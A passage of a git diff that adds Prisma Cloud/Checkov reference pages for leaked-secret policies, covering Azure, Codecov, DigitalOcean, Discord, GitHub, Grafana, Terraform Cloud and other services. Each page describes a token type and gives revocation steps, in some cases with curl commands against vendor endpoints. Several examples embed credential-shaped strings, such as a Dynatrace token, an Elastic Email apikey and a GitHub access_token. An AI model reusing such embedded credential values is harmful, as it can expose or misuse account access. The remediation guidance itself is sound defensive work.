+- Read Only tokens grant read-only access to the project's API. +- Admin tokens grant read and write access for the project's API. + +=== Fix - Buildtime + + +*CircleCI* + + + +. In the CircleCI application, go to your User settings + +. Click Personal API Tokens + +. Click the X in the Remove column for the token you wish to replace and confirm your deletion. + +. Click the Create New Token button. + +. In the Token name field, type a new name for the old token you are rotating. ++ +It can be the same name given to the old token. + +. Click the Add API Token button. + +. After the token appears, copy and paste it to another location. ++ +You will not be able to view the token again. diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-3.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-3.adoc new file mode 100644 index 000000000..701cb96fc --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-3.adoc @@ -0,0 +1,57 @@ +== Azure Storage Account Access Keys + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 12e76aca-9fa6-4eed-92ba-ee6acfe0cbeb + +|Checkov Check ID +|CKV_SECRET_3 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + +When you create a storage account, Azure generates two 512-bit storage account access keys. +These keys can be used to authorize access to data in your storage account via Shared Key authorization. +Leaking one of these keys can therefore compromise the data in the storage account. + +=== Fix - Buildtime +*Azure* + + +. Revoke the exposed secret. ++ +To revoke a user delegation SAS, revoke the user delegation key to quickly invalidate all signatures associated with that key. ++ +To revoke a service SAS that is associated with a stored access policy, you can delete the stored access policy, rename the policy, or change its expiry time to a time that is in the past.
++ + +[source,text] +---- +POST https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Storage/storageAccounts/{accountName}/revokeUserDelegationKeys?api-version=2021-04-01 +---- + +. Clean the git history. ++ +Go under the settings section of your GitHub project and choose the change visibility button at the bottom. + +. Inspect Azure Activity Logs to ensure the key was not utilized during the compromised period. diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-30.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-30.adoc new file mode 100644 index 000000000..1465a673a --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-30.adoc @@ -0,0 +1,50 @@ +== Codecov API key + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| d047a76c-6d7f-4281-bcb9-9e9c79b896d2 + +|Checkov Check ID +|CKV_SECRET_30 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + +Codecov is a tool that is used to measure the test coverage of your codebase. +It generally calculates the coverage ratio by examining which lines of code were executed while running the unit tests. +When linking a GitHub account to Codecov, the service can be restricted to public repositories only, or be allowed to access private repositories as well. + +=== Fix - Buildtime + + +*Codecov* + + + +. Revoke the key + +. In Codecov, click on Settings + +. Click on API in the left sidebar + +. Find the exposed API key and click on Revoke + +. 
Monitor for abuse of the credential diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-31.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-31.adoc new file mode 100644 index 000000000..9e7b1cc44 --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-31.adoc @@ -0,0 +1,40 @@ +== Coinbase Keys + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| d54bf289-817a-41bc-8f31-3502ab3db364 + +|Checkov Check ID +|CKV_SECRET_31 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + +Coinbase is an American publicly traded company that operates a cryptocurrency exchange platform. +Coinbase is a distributed company, and the largest cryptocurrency exchange in the United States by trading volume. + +=== Fix - Buildtime + + +*Coinbase The API key can be revoked from your dashboard in the API tab.* + + diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-32.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-32.adoc new file mode 100644 index 000000000..5259474ae --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-32.adoc @@ -0,0 +1,50 @@ +== Confluent Keys + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 720b664c-19cb-4e26-a6e5-1beb402734a5 + +|Checkov Check ID +|CKV_SECRET_32 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + +API keys for Confluent Cloud can be created with user and service accounts. +A service account is intended to provide an identity for an application or service that needs to perform programmatic operations within Confluent Cloud. +When moving to production, ensure that only service account API keys are used.
+Avoid user account API keys, except for development and testing. +If a user leaves and a user account is deleted, all API keys created with that user account are deleted and might break applications. + +=== Fix - Buildtime + + +*Confluent Cloud* + + + +. From the appropriate API Access tab for the Kafka, Schema Registry, or ksqlDB resource, select the key that you want to delete. + +. Click the trash icon. ++ +The Confirm API key deletion dialog appears. + +. Click Confirm. diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-33.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-33.adoc new file mode 100644 index 000000000..51154d5e3 --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-33.adoc @@ -0,0 +1,53 @@ +== Databricks Authentication Token + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 1979aa5f-0e33-4521-b7aa-0d7f18f298ca + +|Checkov Check ID +|CKV_SECRET_33 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + +To authenticate to and access Databricks REST APIs, you can use Databricks personal access tokens or passwords. +Databricks strongly recommends that you use tokens. +Tokens replace passwords in an authentication flow and should be protected like passwords. + +To protect tokens, Databricks recommends that you store tokens in: + +* Secret management and retrieve tokens in notebooks using the Secrets utility (dbutils.secrets). +* A local key store and use the Python keyring package to retrieve tokens at runtime. + +=== Fix - Buildtime + + +*Databricks* + + + +. Find the token ID. ++ +See Get tokens for the workspace. + +. Call the delete a token API (DELETE /token-management/tokens). ++ +Pass the token ID in the path. 
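The two Databricks steps above can be sketched as a request builder. The host name, token ID, and the `/api/2.0/token-management/tokens/{token_id}` path used here are illustrative assumptions, not values from this page; check them against your workspace's API version before use:

```python
import urllib.request

def build_revoke_request(host, token_id, admin_token):
    """Construct (but do not send) the token-deletion call described above.

    Assumes the workspace exposes DELETE /api/2.0/token-management/tokens/{token_id};
    the token ID is passed in the path, the admin credential in the header.
    """
    url = f"https://{host}/api/2.0/token-management/tokens/{token_id}"
    return urllib.request.Request(
        url,
        method="DELETE",
        # Admin credential: keep it out of source control (environment or secret store)
        headers={"Authorization": f"Bearer {admin_token}"},
    )

# Hypothetical workspace host and token ID, for illustration only
req = build_revoke_request("example.cloud.databricks.com", "1234abcd", "ADMIN_TOKEN")
print(req.get_method(), req.full_url)
```

Building the request separately from sending it keeps the sketch testable without touching a live workspace.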
diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-34.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-34.adoc new file mode 100644 index 000000000..7b7fab450 --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-34.adoc @@ -0,0 +1,58 @@ +== DigitalOcean Token + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 0a2d7460-9379-438d-9e0b-ab2976a826e0 + +|Checkov Check ID +|CKV_SECRET_34 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + +To use the DigitalOcean API, you'll need to generate a personal access token. +Personal access tokens function like ordinary OAuth access tokens. +You can use them to authenticate to the API by including one in a bearer-type Authorization header with your request. +Tokens function like passwords. +Do not hard-code your tokens into programs, where they may accidentally be released in version control and are harder to rotate. +Instead, use environment variables. +If a token becomes compromised, delete it to revoke that token's access. + +=== Fix - Buildtime + + +*DigitalOcean* + + + +. Revoke the token: use the access_token in your token revocation request, which is a POST request to the revoke endpoint with the appropriate parameters.
++ +https://cloud.digitalocean.com/v1/oauth/revoke ++ + +[source,curl] +---- +curl -X POST "https://cloud.digitalocean.com/v1/oauth/revoke" \ + -d "token=$TOKEN" +---- + diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-35.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-35.adoc new file mode 100644 index 000000000..43ac73c20 --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-35.adoc @@ -0,0 +1,52 @@ +== Discord Token + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| b0e5f091-e7de-4d70-bbcf-3289a307c0eb + +|Checkov Check ID +|CKV_SECRET_35 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + +A Discord token provides full access to your account and is required to perform actions within Discord. +It's also useful for allowing bots to do things on your behalf outside of the Discord client. +If you need your Discord token, the only way to find it is via Discord's developer tools.
+ +=== Fix - Buildtime + + +*Discord* + + + + +[source,text] +---- +POST https://discord.com/api/oauth2/token/revoke +Content-Type: application/x-www-form-urlencoded +data: + client_id: + client_secret: + token: +---- + diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-36.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-36.adoc new file mode 100644 index 000000000..5d393328f --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-36.adoc @@ -0,0 +1,57 @@ +== Doppler API Key + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 009c3b4c-16cf-4c85-9b1d-4ab39fdbfb8b + +|Checkov Check ID +|CKV_SECRET_36 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + +The API uses Doppler tokens to authenticate requests. +You can generate and manage your tokens in the dashboard on the Tokens page. +Tokens carry many privileges, so be sure to keep them secure! +Do not store your secret tokens in an .env file or share them in publicly accessible areas such as GitHub, client-side code, etc. +Personal and CLI tokens can both read and write in a workspace, while service tokens are read-only in a single configuration.
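As a sketch of the guidance above, keep the Doppler token in an environment variable and build the Authorization header at runtime instead of committing it to a file; the `DOPPLER_TOKEN` variable name and placeholder value here are assumptions for illustration:

```python
import os

def doppler_auth_headers():
    """Build bearer-auth headers for Doppler API requests.

    Reading the token from the environment (rather than a committed .env
    file) follows the guidance above; DOPPLER_TOKEN is an assumed name.
    """
    token = os.environ["DOPPLER_TOKEN"]  # raises KeyError if unset, failing fast
    return {
        "Authorization": f"Bearer {token}",
        "Accept": "application/json",
    }

os.environ["DOPPLER_TOKEN"] = "dp.ct.example"  # placeholder value for this demo run
print(doppler_auth_headers()["Authorization"])
```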
+ +=== Fix - Buildtime + + +*Doppler* + + + + +[source,curl] +---- +curl --request POST \ + --url https://api.doppler.com/v3/auth/revoke \ + --header 'Accept: application/json' \ + --header 'Content-Type: application/json' \ + --data ' +{ + "token": "" +} +' +---- + diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-37.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-37.adoc new file mode 100644 index 000000000..1daabed4f --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-37.adoc @@ -0,0 +1,55 @@ +== DroneCI Token + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 5686a696-223c-4b07-b5bf-427c780125a9 + +|Checkov Check ID +|CKV_SECRET_37 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + +The remote API uses access tokens to authorize requests. +You can retrieve an access token in the Drone user interface by navigating to your user profile. +Authorization to the API is performed using the HTTP Authorization header. +Provide your token as the bearer token value. +If your repository is private or requires authentication to clone, Drone injects the credentials into your pipeline environment. +Drone uses the oauth2 token associated with the repository owner as the clone credentials. + +=== Fix - Buildtime + + +*DroneCI* + + + +. Revoke the token + +. On the DroneCI page, click on your avatar, then Account + +. Click on Security + +. In the API Tokens section, find the compromised token + +. Click on Delete + +. 
Monitor for abuse diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-38.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-38.adoc new file mode 100644 index 000000000..b802d49bc --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-38.adoc @@ -0,0 +1,52 @@ +== Dropbox App Credentials + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 8f4d0292-8ddc-4505-a52d-3ce1280fc321 + +|Checkov Check ID +|CKV_SECRET_38 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + +When working with the Dropbox APIs, your app will access Dropbox on behalf of your users. You'll need to have each user of your app sign into dropbox.com to grant your app permission to access their data on Dropbox. Dropbox uses OAuth 2.0, an open specification, to authorize access to a user’s data. Once completed by a user, the OAuth flow returns an access token to your app. This authorization token identifies your app and user in subsequent API calls. It should be passed with the Authorization HTTP header value of Bearer. + +=== Fix - Buildtime + + +*Dropbox* + +`/token/revoke` Disables the access token used to authenticate the call. + + +If there is a corresponding refresh token for the access token, this disables that refresh token, as well as any other access tokens for that refresh token.
+ + +[source,text] +---- +curl -X POST https://api.dropboxapi.com/2/auth/token/revoke \ + --header "Authorization: Bearer " +---- + diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-39.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-39.adoc new file mode 100644 index 000000000..75d1234c4 --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-39.adoc @@ -0,0 +1,45 @@ +== Dynatrace token + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| a4e5aa1e-94ba-4aa1-ab46-1f137b10110c + +|Checkov Check ID +|CKV_SECRET_39 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + +To be authenticated to use the Dynatrace API, you need a valid access token or a valid personal access token. +Access to the API is fine-grained, meaning that you also need the proper scopes assigned to the token. +See the description of each request to find out which scopes are required to use it. +Dynatrace uses a unique token format consisting of three components separated by dots (.). +`dt0c01.ST2EY72KQINMH574WMNVI7YN.G3DFPBEJYMODIDAEX454M7YWBUVEFOWKPRVMWFASS64NFH52PX6BNDVFFM572RZM` +The part of a token composed of the prefix and public portion is the token identifier. +For example, dt0c01.ST2EY72KQINMH574WMNVI7YN. +The token identifier can be safely displayed in the UI and can be used for logging purposes.
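The identifier rule above is mechanical: split on dots and keep only the prefix and public portion. A minimal sketch, using the example token documented above:

```python
def dynatrace_token_identifier(token):
    """Return the loggable identifier (prefix + public portion) of a Dynatrace token.

    Per the format above, a token has three dot-separated components; only
    the first two are safe to display or log, never the secret third part.
    """
    prefix, public, _secret = token.split(".")
    return f"{prefix}.{public}"

# Example token quoted in the description above (not a live credential)
token = "dt0c01.ST2EY72KQINMH574WMNVI7YN.G3DFPBEJYMODIDAEX454M7YWBUVEFOWKPRVMWFASS64NFH52PX6BNDVFFM572RZM"
print(dynatrace_token_identifier(token))  # dt0c01.ST2EY72KQINMH574WMNVI7YN
```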
+ +=== Fix - Buildtime + + +*Dynatrace To delete a token, you need an access token with the Write API tokens (apiTokens.write) scope. Send the request to the endpoint for your deployment:* + +* Managed: `+https://{your-domain}/e/{your-environment-id}/api/v2/apiTokens/{id}+` +* SaaS: `+https://{your-environment-id}.live.dynatrace.com/api/v2/apiTokens/{id}+` +* Environment ActiveGate: `+https://{your-activegate-domain}/e/{your-environment-id}/api/v2/apiTokens/{id}+` + + diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-4.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-4.adoc new file mode 100644 index 000000000..31f662f0c --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-4.adoc @@ -0,0 +1,45 @@ +== Basic Auth Credentials + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 7cbba17c-f37e-4594-9d6f-5cb09225de0a + +|Checkov Check ID +|CKV_SECRET_4 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + +Basic authentication is a simple authentication scheme built into the HTTP protocol. +The client sends HTTP requests with the Authorization header that contains the word Basic followed by a space and a base64-encoded string username:password. +Leaked usernames and passwords can be used by attackers to attempt to authenticate to existing accounts and steal the information they hold. + +=== Fix - Buildtime +*Multiple Services* + + +. Revoke the exposed secret. + +. Clean the git history. ++ +Go under the settings section of your GitHub project and choose the change visibility button at the bottom. + +. Inspect your application's access logs to ensure the key was not utilized during the compromised period.
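As the Basic Auth description above notes, the header value is just base64 of username:password, an encoding rather than encryption, so a leaked header is equivalent to a leaked password. A minimal sketch with hypothetical credentials:

```python
import base64

def basic_auth_header(username, password):
    """Build the Authorization header value for HTTP Basic authentication:
    the word "Basic", a space, then base64("username:password")."""
    credentials = base64.b64encode(f"{username}:{password}".encode()).decode()
    return f"Basic {credentials}"

# Hypothetical credentials for illustration only
header = basic_auth_header("alice", "s3cret")
print(header)

# base64 is trivially reversible, which is why interception or leakage
# of this header exposes the plaintext credentials directly
print(base64.b64decode(header.split()[1]).decode())  # alice:s3cret
```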
diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-40.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-40.adoc new file mode 100644 index 000000000..ad32fd74d --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-40.adoc @@ -0,0 +1,51 @@ +== Elastic Email Key + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 9567784e-cd7a-4fdf-9dc1-dcf90adbe6b1 + +|Checkov Check ID +|CKV_SECRET_40 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + +Elastic Email is a mail relay service. +That is, instead of your website sending mail via its own SMTP server, outgoing email is directed through the Elastic Email service and out onto the internet. +The API Key is a 96-character single GUID and it is the key to your account when trying to gain access or make API calls while outside of the User Interface. +Every API call will require this key. +It is unique for API connections and separate from SMTP Relay communication. 
+ +=== Fix - Buildtime + + +*Elastic Email Permanently delete the AccessToken from your account:* + + + + +[source,text] +---- +https://api.elasticemail.com/v2/accesstoken/delete?apikey=7H29A61A88F5D6F1CX5CC79IWQADW3EFC98CD5F4428W7WU2B873256BCECCDCIAP8A5C4JS6A29675XHFBED2DFCDF9I1QW&tokenName=My Token&type= +---- + diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-41.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-41.adoc new file mode 100644 index 000000000..c6cd7c141 --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-41.adoc @@ -0,0 +1,56 @@ +== Fastly Personal Token + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 96ca6d09-8c3e-47f2-b5d7-f5c2181fb387 + +|Checkov Check ID +|CKV_SECRET_41 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + +Fastly's API tokens are unique authentication credentials assigned to individual users. +You need to create an API token to use the Fastly API. +You can use API tokens to grant applications restricted access to your Fastly account and services. +For example, an engineer user could limit a token to only have access to a single service, and restrict the scope to only allow that token to purge by URL. +Every Fastly user can create up to 100 API tokens. + +=== Fix - Buildtime + + +*Fastly To delete an account API token or to revoke another user's API token as a superuser, follow the steps below:* + + + +. Log in to the Fastly web interface and click the Account link from the user menu. ++ +Your account information appears. + +. Click the Account API tokens link. ++ +The Account API Tokens page appears with a list of tokens associated with your organization's Fastly account. + +. Find the API token you want to delete and click the trash icon. ++ +A warning message appears. + +. 
Click the Delete button to permanently delete the API token. diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-42.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-42.adoc new file mode 100644 index 000000000..783028de5 --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-42.adoc @@ -0,0 +1,48 @@ +== FullStory API Key + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 84c57881-ad48-4959-8036-84c20699c43d + +|Checkov Check ID +|CKV_SECRET_42 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + +FullStory's HTTP APIs use API keys for authentication. +If you are configuring an integration or building some tools of your own that make HTTP calls, you will need a key. +In the FullStory UI the "`All Keys`" tab shows you all the keys that you have permission to view. +If you are an Administrator, then in addition to keys that you have created, you'll also be able to see other users`' keys and legacy keys. +If you are a Standard or Architect user, you will only be able to see your own keys. +Administrators who might be looking at a long list of keys can click the "`My Keys`" tab to view only their own keys, or the "`Legacy Keys`" tab to view any legacy keys. + +=== Fix - Buildtime + + +*FullStory To delete a key, click the "`Delete`" button that appears at the end of the row where the key is displayed.* + + +When you delete a key, API calls making use of the key value will stop working immediately. +Administrators may delete keys for all users. +Standard and Architect users may only delete their own keys. +Note that removing or changing the permissions of a user does not affect any API keys that may have been created by that user. 
+For example, if you change a user from "Admin" to "Guest" and wish to remove API keys they may have created, you'll need to do that on the settings page following the instructions above. diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-43.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-43.adoc new file mode 100644 index 000000000..8fc36188e --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-43.adoc @@ -0,0 +1,88 @@ +== GitHub Token + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 7864b6ac-5de9-4845-81f0-b9d9de32a0ca + +|Checkov Check ID +|CKV_SECRET_43 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + + + +*GitHub Personal Access Token* + +Personal access tokens (PATs) are an alternative to using passwords for authentication to GitHub when using the GitHub API or the command line. +If you want to use a PAT to access resources owned by an organization that uses SAML SSO, you must authorize the PAT. + + +*GitHub OAuth Access Token* + +GitHub's OAuth implementation supports the standard authorization code grant type and the OAuth 2.0 Device Authorization Grant for apps that don't have access to a web browser. +If you want to skip authorizing your app in the standard way, such as when testing your app, you can use the non-web application flow. +To authorize your OAuth app, consider which authorization flow best fits your app. + + +*GitHub App Token* + +After you create a GitHub App, you'll need to generate one or more private keys. +You'll use the private key to sign access token requests. +You can create multiple private keys and rotate them to prevent downtime if a key is compromised or lost.
+ + +*GitHub Refresh Token* +To enforce regular token rotation and reduce the impact of a compromised token, you can configure your GitHub App to use expiring user access tokens. +Expiring user tokens expire after 8 hours. +When you receive a new user-to-server access token, the response will also contain a refresh token, which can be exchanged for a new user token and refresh token. +Refresh tokens are valid for 6 months. + +=== Fix - Buildtime + + +*GitHub OAuth Access Token* + + + +. In the upper-right corner of any page, click your profile photo, then click Settings. + +. In the "Integrations" section of the sidebar, click Applications. + +. Click the Authorized OAuth Apps tab. + +. Review the tokens that have access to your account. ++ +For those that you don't recognize or that are out-of-date, click , then click Revoke. ++ +To revoke all tokens, click Revoke all. ++ + +[source,text] +---- +curl \ + -X DELETE \ + -H "Accept: application/vnd.github+json" \ + -H "Authorization: Bearer " \ + https://api.github.com/applications/Iv1.8a61f9b3a7aba766/token \ + -d '{"access_token":"e72e16c7e42f292c6912e7710c838347ae178b4a"}' +---- + diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-44.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-44.adoc new file mode 100644 index 000000000..de2f51138 --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-44.adoc @@ -0,0 +1,59 @@ +== GitLab Token + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 14db94b2-590d-484b-98c5-b96aec2cfe97 + +|Checkov Check ID +|CKV_SECRET_44 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + +Personal access tokens can be an alternative to OAuth2 and used to: + +* Authenticate with the GitLab API. +* Authenticate with Git using HTTP Basic Authentication.
+ +In both cases, you authenticate with a personal access token in place of your password. +Personal access tokens are: + +* Required when two-factor authentication (2FA) is enabled. +* Used with a GitLab username to authenticate with GitLab features that require usernames, for example, the GitLab-managed Terraform state backend and the Docker container registry. +* Similar to project access tokens and group access tokens, but attached to a user rather than a project or group. + +=== Fix - Buildtime + + +*GitLab* + + + +. In the top-right corner, select your avatar. + +. Select Edit profile. + +. On the left sidebar, select Access Tokens. + +. In the Active personal access tokens area, next to the key, select Revoke. diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-45.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-45.adoc new file mode 100644 index 000000000..0dab22237 --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-45.adoc @@ -0,0 +1,53 @@ +== Google Cloud Keys + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 9d1b426e-4498-4660-a34f-8a43beb0a2b7 + +|Checkov Check ID +|CKV_SECRET_45 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + +The Google Cloud API key can be used to authenticate to an API. +The API key associates the request with a Google Cloud project for billing and quota purposes. +Because API keys do not identify the caller, they are generally used for accessing public data or resources. +Many Google Cloud APIs do not accept API keys for authentication. +When you use Google Cloud API keys in your applications, ensure that they are kept secure during both storage and transmission. +Publicly exposing your API keys can lead to unexpected charges on your account. + +=== Fix - Buildtime + + +*Google Cloud* + + + +. 
Navigate to APIs & Services console at https://console.cloud.google.com/apis/credentials. + +. In the main navigation panel, select Credentials to access the list of the API keys created for the selected Google Cloud Platform (GCP) project. + +. On the Credentials page, in the API Keys section, select the API key that you want to delete, and choose the DELETE button from the console top menu to remove the selected key from your GCP project. + +. Inside the Delete credential confirmation box, choose DELETE to confirm the removal action. ++ +The selected API key will be deleted immediately and permanently. diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-46.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-46.adoc new file mode 100644 index 000000000..3c8e109ce --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-46.adoc @@ -0,0 +1,52 @@ +== Grafana Token + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| b0a8cae4-c04e-4a99-a64e-b582d3e83000 + +|Checkov Check ID +|CKV_SECRET_46 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + +The Grafana API key is a randomly generated string that external systems use to interact with Grafana HTTP APIs. +When you create an API key, you specify a Role that determines the permissions associated with the API key. +Role permissions control the actions the API key can perform on Grafana resources.
+
+=== Fix - Buildtime
+
+
+*Grafana `DELETE /api/auth/keys/:id`*
+
+
+[source,text]
+----
+DELETE /api/auth/keys/3 HTTP/1.1
+Accept: application/json
+Content-Type: application/json
+Authorization: Bearer eyJrIjoiT0tTcG1pUlY2RnVKZTFVaDFsNFZXdE9ZWmNrMkZYbk
+----
+
diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-47.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-47.adoc
new file mode 100644
index 000000000..0b871077c
--- /dev/null
+++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-47.adoc
@@ -0,0 +1,76 @@
+== Terraform Cloud API Token
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 56b81a7c-1927-405e-be9e-c3213af08142
+
+|Checkov Check ID
+|CKV_SECRET_47
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Git
+
+|===
+
+
+
+=== Description
+
+
+Terraform Cloud supports three distinct types of API tokens with varying levels of access: user, team, and organization.
+API tokens are displayed only once, when they are created, and are obfuscated thereafter.
+If a token is lost, it must be regenerated.
+
+
+*User API Tokens*
+
+User tokens are the most flexible token type because they inherit permissions from the user they are associated with.
+
+
+*Team API Tokens*
+
+Team API tokens allow access to the workspaces that the team has access to, without being tied to any specific user.
+Each team can have one valid API token at a time, and any member of a team can generate or revoke that team's token.
+When a token is regenerated, the previous token immediately becomes invalid.
+
+
+*Organization API Tokens*
+
+Organization API tokens allow access to the organization-level settings and resources, without being tied to any specific team or user.
+To manage the API token for an organization, go to Organization settings > API Token and use the controls under the "Organization Tokens" header.
+Each organization can have one valid API token at a time.
+Only organization owners can generate or revoke an organization's token.
+
+=== Fix - Buildtime
+
+
+*Terraform Cloud `DELETE /authentication-tokens/:id`*
+
+
+[source,text]
+----
+curl \
+  --header "Authorization: Bearer $TOKEN" \
+  --header "Content-Type: application/vnd.api+json" \
+  --request DELETE \
+  https://app.terraform.io/api/v2/authentication-tokens/at-6yEmxNAhaoQLH1Da
+----
+
diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-48.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-48.adoc
new file mode 100644
index 000000000..e643c4129
--- /dev/null
